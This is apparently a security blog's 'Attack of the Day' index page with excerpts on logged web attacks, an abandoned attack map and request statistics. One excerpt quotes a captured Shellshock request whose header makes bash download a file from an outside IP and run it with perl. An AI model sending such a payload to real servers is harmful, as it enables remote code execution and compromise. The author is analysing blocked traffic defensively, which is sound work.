Thanks for the Heads Up

Posted in Attack of the Day (2 Comments)

While cleaning out some junk logs and double checking things for a different project I’m currently working on, I stumbled across this in the long list of thrown away traffic:

    GET /Ringing.at.your.dorbell! HTTP/1.0
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Cookie: Greetz to M, st0n3d, Jorgee, CoLdZeRo, and Tomato lol!
    Referer: http://google.com/search?q=2+guys+1+horse
    User-Agent: CVE-2014-6271 😉
    Test: Still a lot of these at 2015! haha! ‘tangina!
    X-Forwarded-For: 174.36.209.208

By itself, kind of funny for a number of reasons. I thought it was very kind of them to announce their presence AND give me 3 […]

Attack Maps

Posted in Attack of the Day

This isn’t really an attack of the day.. it’s more of an “I needed to learn JavaScript and this was my project” type thing. The map is fun for about 10 minutes; after that, not as much. It is cool to see where things are coming from and what is being thrown away, though. Want to see this glorious map?

*updated: 8/3/15* Well, too bad. I broke it and am not really interested in fixing it. Sorry.

How the Map Works

Data Collection: All of the data is collected in Splunk via syslog. […]

Statistics..

Posted in Attack of the Day

Break out your textbooks, kids. Today we’re going to talk about statistics.. Well, more like “counting with graphs” but whatever.. A couple of points on the data presented below. First, it is very common to see a single request violate several rules. Take this request, for instance.

    GET /cgi-bin/bts.cgi HTTP/1.0
    Host: 69.44.4.28
    User-Agent: () { :;}; /bin/bash -c “cd /tmp;wget http://100.42.30.34/lex ; curl -O http://100.42.30.34/lex ; perl lex ;rm -rf lex”
    Connection: Keep-Alive
    X-Forwarded-For: 72.9.231.226
    X_FORWARDED_PROTO: https

There’s so much wrong with this, I’m not sure where to start. Signature violations, […]